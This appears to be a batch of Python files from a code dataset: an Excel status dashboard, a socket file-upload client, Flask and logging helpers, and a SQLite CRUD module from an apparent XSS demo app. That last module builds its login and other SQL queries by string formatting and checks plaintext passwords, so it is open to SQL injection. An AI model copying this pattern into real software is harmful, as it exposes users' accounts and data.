+{"seq_id":"147039522","text":"file_r = open(\"types.txt\", \"rw+\")\nfile_w = open('typeList','w')\n\nresult = \"\"\n\nfor line in file_r:\n result += \"\\n\"\n\nfile_w.write(result)\n\nfile_r.close()\nfile_r.close()\n","sub_path":"js/placeTypes.py","file_name":"placeTypes.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"129479409","text":"import os\nimport xlrd\nfrom datetime import datetime\nbase_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ntracker_path=os.path.join(base_path,'templates','MasterTracker')\n\n# m_tracker=pd.ExcelFile(tracker_path+\"\\\\Master_Tracker_v8.6.xlsx\")\n# desg=pd.read_excel(tracker_path+\"\\\\Master_Tracker_v8.6.xlsx\",sheetname=\"DESG T18 Allocation\")\n#\nmaster_tracker=xlrd.open_workbook(tracker_path+\"\\\\Master_Tracker_v8.6.xlsx\")\n\npdc=master_tracker.sheet_by_name(\"DESG PDC Allocation\")\ndesg=master_tracker.sheet_by_name(\"DESG T18 Allocation\")\nldm=master_tracker.sheet_by_name(\"LDM Allocation\")\ndsg_iab=master_tracker.sheet_by_name(\"DSG - IAB Allocation\")\nndq_iab=master_tracker.sheet_by_name(\"NDQ - IAB Allocation\")\ndsg_fab=master_tracker.sheet_by_name(\"DSG - FAB Allocation\")\nndq_fab=master_tracker.sheet_by_name(\"NDQ - FAB Allocation\")\ntransit=master_tracker.sheet_by_name(\"Transit Allocation\")\n\ntoday=datetime.now().month\n\n#1st month\none_pc_in_queue=[]\none_pc_inprogress=[]\none_pc_on_hold=[]\none_pc_completed=[]\none_pc_rejected=[]\none_gml_in_queue=[]\none_gml_inprogress=[]\none_gml_on_hold=[]\none_gml_completed=[]\none_gml_rejected=[]\n\n#2nd month\ntwo_pc_in_queue=[]\ntwo_pc_inprogress=[]\ntwo_pc_on_hold=[]\ntwo_pc_completed=[]\ntwo_pc_rejected=[]\ntwo_gml_in_queue=[]\ntwo_gml_inprogress=[]\ntwo_gml_on_hold=[]\ntwo_gml_completed=[]\ntwo_gml_rejected=[]\n\n#PDC\npdc_inprogress_status=[\"In Progress - PDC\",\"In Progress - AFR Load\",\"QA Completed - Ready for submission\",\"In Progress-Delta\",\"Delta completed-Ready for submission\",]\npdc_queue_status=[\"In Queue - To be Assigned\",]\npdc_completed_status=[\"PDC completed & AFR Submitted\",\"AFR Load Completed & Posted\",\"Delta completed & AFR submitted\",]\npdc_on_hold_status=[\"On Hold\",]\npdc_rejected_status=[\"Rejected\",]\n# # PC Status\n# pc_inprogress_status=[\"In Progress - [PC] Perform Validation of T18\",\"In Progress - [PC] Load PNI\",]\n# pc_queue_status=[\"In Queue - [PC] To be Assigned\",]\n# pc_completed_status=[\"Completed [PC] - Trigger Triage\",\"Completed - [PC] GDSS Notification\",\"On Hold - Paused in Triage\",]\n# pc_on_hold_status=[\"On Hold - Awaiting Address File\",\"On Hold - [PC] Data Issues\",\"On Hold - [PC] NDD not available\",\"On Hold - [PC] Awaiting Boundary Update\",\"On Hold - [PC] Issues - NBN Internal\",\"On Hold - [PC] GDSS/PNI Issue\",]\n# pc_rejected_status=[\"Rejected - [PC] Sent Back to Telstra (DESG)\",\"Rejected - [PC] Sent Back to Telstra (LDM)\",\"Rejected - [PC] Sent Back to Telstra (AP)\",\"Rejected - [PC] Sent Back to Telstra (Design/NA)\"]\n# # GML Status\n# gml_queue_status=[\"In Queue - [GML] To be Assigned\",]\n# gml_inprogress_status=[\"In Progress - [GML] PNI Load - Complete Run\",\"In Progress - [GML] Generate Trace Report\",]\n# gml_on_hold_status=[\"On Hold - [GML] Issues - NBN Internal\",\"On Hold - [GML] PNI Issue\",\"On Hold - [GML] Awaiting Boundary Update\",]\n# gml_rejected_status=[\"Rejected - [GML] Sent Back to Telstra (DESG)\",]\n# gml_completed_status=[\"Completed - [GML] Handover to DSG\",]\n# #LDM Status\n# ldm_inprogress_status=[\"In Progress - LocID Matching\",\"In Progress - LocID Matching Completed\",\"In Progress - Repurposing\",\"In Progress - Repurposing Completed\",\"In Progress - Address Alignment\",\"In Progress - Address Alignment Completed\",\"In Progress - Final Validations\",]\n# ldm_queue_status=[\"In Queue - To be Assigned\",]\n# ldm_completed_status=[\"Completed - 
Handover done\",]\n# ldm_on_hold_status=[\"On Hold\",]\n# ldm_rejected_status=[\"Rejected\",]\n#IAB DSG\ndsg_iab_inprogress_status=[\"In Progress\",\"In Progress - HFC Completed\",]\ndsg_iab_queue_status=[\"In Queue - To be Assigned\",\"In Queue - HFC Completed\",]\ndsg_iab_completed_status=[\"Completed\",]\ndsg_iab_on_hold_status=[\"On Hold - HFC Completed\",\"On Hold - PNI Issues\",\"On Hold - Data Issues\",\"On Hold - Document Unavailability\",\"On Hold - Awaiting Upstream team Updates\",\"On Hold - PNI Issues\",\"On Hold - Data Issues\",\"On Hold - Document Unavailability\",\"On Hold - Awaiting Upstream team Updates\",]\ndsg_iab_rejected_status=[\"Rejected\",]\n#IAB NDQ\nndq_iab_inprogress_status=[\"In Progress\",]\nndq_iab_queue_status=[\"In Queue - To be Assigned (QI)\",\"In Queue - To be Assigned (Defect Resolution)\",]\nndq_iab_completed_status=[\"Completed\",\"Completed - Handed over to NEO\",]\nndq_iab_on_hold_status=[\"On Hold\",]\nndq_iab_rejected_status=[\"Rejected\",]\n#FAB DSG\ndsg_fab_inprogress_status=[\"In Progress\",]\ndsg_fab_queue_status=[\"In Queue - To be Assigned\",\"In Queue - Awaiting T18 Lite\",]\ndsg_fab_completed_status=[\"Completed\",]\ndsg_fab_on_hold_status=[\"On Hold\",]\ndsg_fab_rejected_status=[\"Rejected\",]\n#FAB NDQ\nndq_fab_inprogress_status=[\"In Progress\",]\nndq_fab_queue_status=[\"In Queue - To be Assigned (QI)\",\"In Queue - To be Assigned (Defect Resolution)\",]\nndq_fab_completed_status=[\"Completed - Handed over to NEO\",\"Completed - Awaiting final Acceptance\",\"Completed - Accepted by NEO\",]\nndq_fab_on_hold_status=[\"On Hold\",]\nndq_fab_rejected_status=[\"Rejected\",]\n#Transit\npc_inprogress_status=[\"In Progress - PNI Load\",\"In Progress - Asset Remediation\",\"In Progress - Defect Fix\",]\npc_queue_status=[\"In Queue - To be Assigned (PNI Load)\",\"In Queue - To be Assigned (Defects)\",]\npc_completed_status=[\"Completed - Handed over to NDQ\",\"Completed - Defects fixed & notified NDQ\",\"Completed - Final Acceptance Received\",]\n\ndef desg_report():\n\tone_pc_count=two_pc_count=third_pc_count=one_gml_count=two_gml_count=third_gml_count=[]\n\tfor i in range(desg.nrows):\n\t\tinput_date=desg.cell(i,7).value\n\t\tst=desg.cell(i,6).value\n\t\tstatus=st.strip()\n\t\tsam_name=desg.cell(i,0).value\n\t\tif type(input_date) == float:\n\t\t\tdate=xlrd.xldate_as_tuple(desg.cell(i,7).value,master_tracker.datemode)\n\t\t\tdate=datetime(*date[0:6])\n\t\t\tdiff=today-date\n\t\t\tif diff.days>=9:\n\t\t\t\tif \"Queue\" in status and \"PC\" in status:\n\t\t\t\t\tone_pc_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status and \"PC\" in status:\n\t\t\t\t\tone_pc_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status and \"PC\" in status:\n\t\t\t\t\tone_pc_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status and \"PC\" in status:\n\t\t\t\t\tone_pc_rejected.append(sam_name)\n\t\t\t\telif \"Completed\" in status and \"PC\" in status:\n\t\t\t\t\tone_pc_completed.append(sam_name)\n\t\t\t\telif \"Queue\" in status and \"GML\" in status:\n\t\t\t\t\tone_gml_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status and \"GML\" in status:\n\t\t\t\t\tone_gml_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status and \"GML\" in status:\n\t\t\t\t\tone_gml_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status and \"GML\" in status:\n\t\t\t\t\tone_gml_rejected.append(sam_name)\n\t\t\t\telif \"Completed\" in status and \"GML\" in status:\n\t\t\t\t\tone_gml_completed.append(sam_name)\n\n\n\t\t\tif 
diff.days>=30:\n\t\t\t\tif \"Queue\" in status and \"PC\" in status:\n\t\t\t\t\ttwo_pc_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status and \"PC\" in status:\n\t\t\t\t\ttwo_pc_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status and \"PC\" in status:\n\t\t\t\t\ttwo_pc_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status and \"PC\" in status:\n\t\t\t\t\ttwo_pc_rejected.append(sam_name)\n\t\t\t\telif \"Completed\" in status and \"PC\" in status:\n\t\t\t\t\ttwo_pc_completed.append(sam_name)\n\t\t\t\telif \"Queue\" in status and \"GML\" in status:\n\t\t\t\t\ttwo_gml_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status and \"GML\" in status:\n\t\t\t\t\ttwo_gml_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status and \"GML\" in status:\n\t\t\t\t\ttwo_gml_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status and \"GML\" in status:\n\t\t\t\t\ttwo_gml_rejected.append(sam_name)\n\t\t\t\telif \"Completed\" in status and \"GML\" in status:\n\t\t\t\t\ttwo_gml_completed.append(sam_name)\n\n\t\t\n\t\t\t\n\n\tone_pc_count=[len(one_pc_in_queue),len(one_pc_inprogress),len(one_pc_completed),len(one_pc_on_hold),len(one_pc_rejected)]\n\ttwo_pc_count=[len(two_pc_in_queue),len(two_pc_inprogress),len(two_pc_completed),len(two_pc_on_hold),len(two_pc_rejected)]\n\tone_gml_count=[len(one_gml_in_queue),len(one_gml_inprogress),len(one_gml_completed),len(one_gml_on_hold),len(one_gml_rejected)]\n\ttwo_gml_count=[len(two_gml_in_queue),len(two_gml_inprogress),len(two_gml_completed),len(two_gml_on_hold),len(two_gml_rejected)]\n\n\treturn [one_pc_count,two_pc_count],[one_gml_count,two_gml_count]\n\n\n#LDM Report\nldm_input_date=[]\n\n#1st month\none_ldm_in_queue=[]\none_ldm_inprogress=[]\none_ldm_on_hold=[]\none_ldm_completed=[]\none_ldm_rejected=[]\n\n#2nd month\ntwo_ldm_in_queue=[]\ntwo_ldm_inprogress=[]\ntwo_ldm_on_hold=[]\ntwo_ldm_completed=[]\ntwo_ldm_rejected=[]\n\n#3rd month\nthird_ldm_in_queue=[]\nthird_ldm_inprogress=[]\nthird_ldm_on_hold=[]\nthird_ldm_completed=[]\nthird_ldm_rejected=[]\n\n# ldm_inprogress_status=[\"In Progress - LocID Matching\",\"In Progress - LocID Matching Completed\",\"In Progress - Repurposing\",\"In Progress - Repurposing Completed\",\"In Progress - Address Alignment\",\"In Progress - Address Alignment Completed\",\"In Progress - Final Validations\",]\n# ldm_queue_status=[\"In Queue - To be Assigned\",]\n# ldm_completed_status=[\"Completed - Handover done\",]\n# ldm_on_hold_status=[\"On Hold\",]\n# ldm_rejected_status=[\"Rejected\",]\n\ndef ldm_report():\n\tfor i in range(ldm.nrows):\n\t\tinput_date=ldm.cell(i,8).value\n\t\tstatus=ldm.cell(i,6).value\n\t\tsam_name=ldm.cell(i,0).value\n\t\tif type(input_date) == float:\n\t\t\tdate=xlrd.xldate_as_tuple(ldm.cell(i,8).value,master_tracker.datemode)\n\t\t\ttoday=datetime.now().month\n\t\t\tif today==date[1]:\n\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\tone_ldm_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\tone_ldm_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\tone_ldm_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\tone_ldm_rejected.append(sam_name)\n\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\tone_ldm_completed.append(sam_name)\n\n\n\t\t\tif today==1:\n\t\t\t\tif date[1]==12:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in 
status:\n\t\t\t\t\t\ttwo_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\ttwo_ldm_completed.append(sam_name)\n\n\t\t\t\tif date[1]==11:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\tthird_ldm_completed.append(sam_name)\n\n\t\t\telif today==2:\n\t\t\t\tif date[1]==1:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\ttwo_ldm_completed.append(sam_name)\n\n\t\t\t\tif date[1]==12:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\tthird_ldm_completed.append(sam_name)\n\n\t\t\telse:\n\t\t\t\tif date[1]==(today-1):\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\ttwo_ldm_completed.append(sam_name)\n\t\t\t\tif date[1]==(today-2):\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\tthird_ldm_completed.append(sam_name)\n\n\tone_ldm_count=[len(one_ldm_in_queue),len(one_ldm_inprogress),len(one_ldm_completed),len(one_ldm_on_hold),len(one_ldm_rejected)]\n\ttwo_ldm_count=[len(two_ldm_in_queue),len(two_ldm_inprogress),len(two_ldm_completed),len(two_ldm_on_hold),len(two_ldm_rejected)]\n\tthird_ldm_count=[len(third_ldm_in_queue),len(third_ldm_inprogress),len(third_ldm_completed),len(third_ldm_on_hold),len(third_ldm_rejected)]\n\treturn [one_ldm_count,two_ldm_count,third_ldm_count]\n\n#DSG IAB Report\n\n\n#1st month\none_dsg_iab_in_queue=[]\none_dsg_iab_inprogress=[]\none_dsg_iab_on_hold=[]\none_dsg_iab_completed=[]\none_dsg_iab_rejected=[]\n\n#2nd month\ntwo_dsg_iab_in_queue=[]\ntwo_dsg_iab_inprogress=[]\ntwo_dsg_iab_on_hold=[]\ntwo_dsg_iab_completed=[]\ntwo_dsg_iab_rejected=[]\n\n#3rd 
month\nthird_dsg_iab_in_queue=[]\nthird_dsg_iab_inprogress=[]\nthird_dsg_iab_on_hold=[]\nthird_dsg_iab_completed=[]\nthird_dsg_iab_rejected=[]\ndsg_iab_inprogress_status=[\"In Progress\",\"In Progress - HFC Completed\",]\ndsg_iab_queue_status=[\"In Queue - To be Assigned\",\"In Queue - HFC Completed\",]\ndsg_iab_completed_status=[\"Completed\",]\ndsg_iab_on_hold_status=[\"On Hold - HFC Completed\",\"On Hold - PNI Issues\",\"On Hold - Data Issues\",\"On Hold - Document Unavailability\",\"On Hold - Awaiting Upstream team Updates\",\"On Hold - PNI Issues\",\"On Hold - Data Issues\",\"On Hold - Document Unavailability\",\"On Hold - Awaiting Upstream team Updates\",]\ndsg_iab_rejected_status=[\"Rejected\",]\ndef dsg_iab_report():\n\tfor i in range(dsg_iab.nrows):\n\t\tinput_date=dsg_iab.cell(i,8).value\n\t\tstatus=dsg_iab.cell(i,6).value\n\t\tsam_name=dsg_iab.cell(i,0).value\n\t\tif type(input_date) == float:\n\t\t\tdate=xlrd.xldate_as_tuple(dsg_iab.cell(i,8).value,master_tracker.datemode)\n\t\t\ttoday=datetime.now().month\n\t\t\tif today==date[1]:\n\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\tone_dsg_iab_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\tone_dsg_iab_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\tone_dsg_iab_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\tone_dsg_iab_rejected.append(sam_name)\n\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\tone_dsg_iab_completed.append(sam_name)\n\t\t\tif today==1:\n\t\t\t\tif date[1]==12:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_completed.append(sam_name)\n\n\t\t\t\tif date[1]==11:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\tthird_dsg_iab_completed.append(sam_name)\n\n\n\t\t\telif today==2:\n\t\t\t\tif date[1]==1:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_completed.append(sam_name)\n\n\t\t\t\tif date[1]==12:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\tthird_dsg_iab_completed.append(sam_name)\n\n\t\t\telse:\n\t\t\t\tif 
date[1]==(today-1):\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_completed.append(sam_name)\n\n\t\t\t\tif date[1]==(today-2):\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\tthird_dsg_iab_completed.append(sam_name)\n\n\tone_dsg_iab_count=[len(one_dsg_iab_in_queue),len(one_dsg_iab_inprogress),len(one_dsg_iab_completed),len(one_dsg_iab_on_hold),len(one_dsg_iab_rejected)]\n\ttwo_dsg_iab_count=[len(two_dsg_iab_in_queue),len(two_dsg_iab_inprogress),len(two_dsg_iab_completed),len(two_dsg_iab_on_hold),len(two_dsg_iab_rejected)]\n\tthird_dsg_iab_count=[len(third_dsg_iab_in_queue),len(third_dsg_iab_inprogress),len(third_dsg_iab_completed),len(third_dsg_iab_on_hold),len(third_dsg_iab_rejected)]\n\treturn [one_dsg_iab_count,two_dsg_iab_count,third_dsg_iab_count]\n","sub_path":"hda_forum/desg_t18/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":16590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
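The dashboard above decodes Excel serial dates with xlrd.xldate_as_tuple before comparing months. A minimal sketch of that conversion in isolation (the serial value is a made-up example):

```python
import xlrd
from datetime import datetime

# Excel stores dates as floats; xldate_as_tuple decodes one given the
# workbook's datemode (0 = 1900-based, 1 = 1904-based, from book.datemode).
serial = 44083.0  # hypothetical cell value
parts = xlrd.xldate_as_tuple(serial, 0)  # (year, month, day, hour, minute, second)
dt = datetime(*parts)
print(dt.month, (datetime.now() - dt).days)
```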
+{"seq_id":"213319249","text":"# Written and modifed by Muhammad Hakimi bin Mohd Laji (2019290708) #\n# Based on codes from https://linuxhint.com/python_socket_file_transfer_send/ #\n# Simple Python code for file transfer from client to server #\n# This code is for CLIENT side #\n\n# Importing libraries\nimport socket\nimport sys\n\n# Lets catch the 1st argument as server ip\nif (len(sys.argv) > 1):\n ServerIp = sys.argv[1]\nelse:\n print(\"\\nRun like \\n python3 clientStore.py < server ip address > \\n\\n\")\n exit(1)\n\n\n# Now we can create socket object\ns = socket.socket()\n\n# Lets choose one port and connect to that port\nPORT = 9898\n\n# Lets connect to that port where server may be running\ns.connect((ServerIp, PORT))\n\n# We can send any file by typing its name including the extension (example: boi.c)\nfiletosend = input('\\nEnter the file name to be stored in server: ') \ns.send(filetosend.encode()) \nfile = open(filetosend, \"rb\") \n\nSendData = file.read(99999)\n\nwhile SendData:\n # Now we can receive data from server\n print(\"\\n>Message received from the server:\", s.recv(1024).decode(\"utf-8\"))\n #Now send the content of the file to server\n s.send(SendData)\n SendData = file.read(99999)\n print(\">\" + filetosend + \" has been copied successfully to the server for storage.\\n\")\n \n# Close the connection from client side\ns.close()\n","sub_path":"clientStore.py","file_name":"clientStore.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"26594809","text":"from flask import flash, render_template, url_for, redirect, Blueprint\nfrom __init__ import mongo\n\n############################################################\n# MAIN ROUTES\n############################################################\n\nmain = Blueprint('main', __name__, template_folder=\"templates\")\n\n\n@main.route('/')\ndef home():\n \"\"\"Display the home page.\"\"\"\n # find all unanswered posts\n post_data = mongo.db.posts.find()\n\n context = {\n 'posts': post_data\n }\n return render_template('home.html', **context)\n","sub_path":"routes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"66157586","text":"import json\nimport os\nimport sys\n\n\nclass Results:\n \"\"\"\n Record the results and store them to the json files\n \"\"\"\n def __init__(self, exp_name, writer):\n self.exp_name = exp_name\n self.writer = writer\n if not os.path.exists('./json/'):\n os.mkdir('./json/')\n if not os.path.exists('./json/' + exp_name):\n os.mkdir('./json/' + exp_name)\n\n self.exp_path = './json/' + exp_name + '/result.json'\n\n # See whether this experiment exists\n if os.path.exists(self.exp_path):\n print('This experiment has ben run.')\n sys.exit()\n\n # create the dictionary container for results to be recorded\n\n self.result = {\n 'name': exp_name,\n 'epoch': [],\n 'train_loss': [],\n 'train_acc@1': [],\n 'train_acc@5': [],\n 'test_acc@1': [],\n 'test_acc@5': [],\n }\n\n def record(self, loss, top1_t, top5_t, acc1, acc5, epoch, lr=0.1):\n self.writer.add_scalar('train_loss', loss, global_step=epoch)\n self.writer.add_scalar('train_acc@1', top1_t, global_step=epoch)\n self.writer.add_scalar('train_acc@5', top5_t, global_step=epoch)\n self.writer.add_scalar('test_acc@1', acc1, global_step=epoch)\n self.writer.add_scalar('test_acc@5', acc5, global_step=epoch)\n self.writer.add_scalar('lr', lr, global_step=epoch)\n self.result['train_loss'].append(loss)\n self.result['epoch'].append(epoch)\n self.result['train_acc@1'].append(top1_t)\n self.result['train_acc@5'].append(top5_t)\n self.result['test_acc@1'].append(acc1)\n self.result['test_acc@5'].append(acc5)\n\n def write_result(self):\n # write json file\n with open(self.exp_path, 'w') as file:\n json.dump(self.result, file)\n self.writer.close()\n","sub_path":"imagenet/utils/result_processor.py","file_name":"result_processor.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"55958358","text":"#coding=utf-8\nimport sqlite3\n\ndef connect_db():\n return sqlite3.connect(\"./database.db\")\n\n#login\ndef get_user_from_username_and_password(username, password):\n conn = connect_db()\n cur = conn.cursor()\n cur.execute('SELECT id, username FROM `user` WHERE username=\\'%s\\' AND password=\\'%s\\'' % (username, password))\n row = cur.fetchone()\n conn.commit()\n conn.close()\n return {'id': row[0], 'username': row[1]} if row is not None else None\n\n\ndef get_user_from_id(uid):\n conn = connect_db()\n cur = conn.cursor()\n cur.execute('SELECT id, username FROM `user` WHERE id=%d' % uid)\n row = cur.fetchone()\n conn.commit()\n conn.close()\n return {'id': row[0], 'username': row[1]}\n\n\ndef create_time_line(uid, content):\n conn = connect_db()\n cur = conn.cursor()\n cur.execute('INSERT INTO `time_line` VALUES (NULL, %d, \\'%s\\')' % (uid, content))\n row = cur.fetchone()\n conn.commit()\n conn.close()\n return row\n\n\ndef get_time_lines():\n conn = connect_db()\n cur = conn.cursor()\n cur.execute('SELECT id, user_id, content FROM `time_line` ORDER BY id DESC')\n rows = cur.fetchall()\n conn.commit()\n conn.close()\n return map(lambda row: {'id': row[0], 'user_id': row[1], 'content': row[2]}, rows)\n\n\ndef user_delete_time_line_of_id(uid, tid):\n conn = connect_db()\n cur = conn.cursor()\n cur.execute('DELETE FROM `time_line` WHERE user_id=%s AND id=%s' % (uid, tid))\n conn.commit()\n conn.close()\n","sub_path":"flask_xss/curd.py","file_name":"curd.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
